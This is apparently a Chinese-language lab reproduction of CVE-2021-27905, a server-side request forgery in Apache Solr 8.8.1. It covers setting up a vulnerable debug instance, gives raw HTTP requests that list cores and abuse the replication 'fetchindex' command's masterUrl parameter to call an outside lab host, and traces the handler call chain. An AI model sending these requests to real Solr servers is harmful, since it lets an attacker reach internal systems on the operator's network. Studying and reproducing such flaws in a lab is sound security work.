漏洞简介
漏洞主要是基于 Solr 的主从复制(Replication)时,可以传入任意URL,而 Solr 会针对此 URL 进行请求。
漏洞复现
环境搭建,下载符合存在漏洞的 Apache 漏洞版本:Apache Solr 8.8.1
tar -zxvf solr-8.8.1.tgz #解压文件
sudo apt install openjdk-8-jre-headless # 安装 java 环境
cd solr-8.8.1/bin/
./solr -c -f -a "-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=18522" -p 8983 # 以Debug 模式启动
./solr create -c test_solr #创建一个数据驱动模式的核心
CVE-2021-27905 Apache solr ssrf
首先先读取一下 core_name
GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1
Host: 192.168.153.131:8983
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://192.168.153.131:8983/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
GET /solr/test_solr/replication?command=fetchindex&masterUrl=http://192.168.153.1:9999/testssrf HTTP/1.1
Host: 192.168.153.131:8983
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://192.168.153.131:8983/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
https://solr.apache.org/guide/8_9/index-replication.html
我猜测这个漏洞的发现是因为查看了 Solr 的官方文档,发现 Solr 存在指定拷贝的功能,然后未对指定的 url 校验就进行请求,所以会产生 ssrf 漏洞。
配置调试环境
org.apache.solr.handler.ReplicationHandler#handleRequestBody
org.apache.solr.handler.ReplicationHandler#fetchIndex
org.apache.solr.handler.ReplicationHandler#doFetch
org.apache.solr.handler.IndexFetcher#fetchLatestIndex(boolean)
org.apache.solr.handler.IndexFetcher#fetchLatestIndex(boolean, boolean)
org.apache.sor.handler.IndexFetcher#getLatestVersion
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论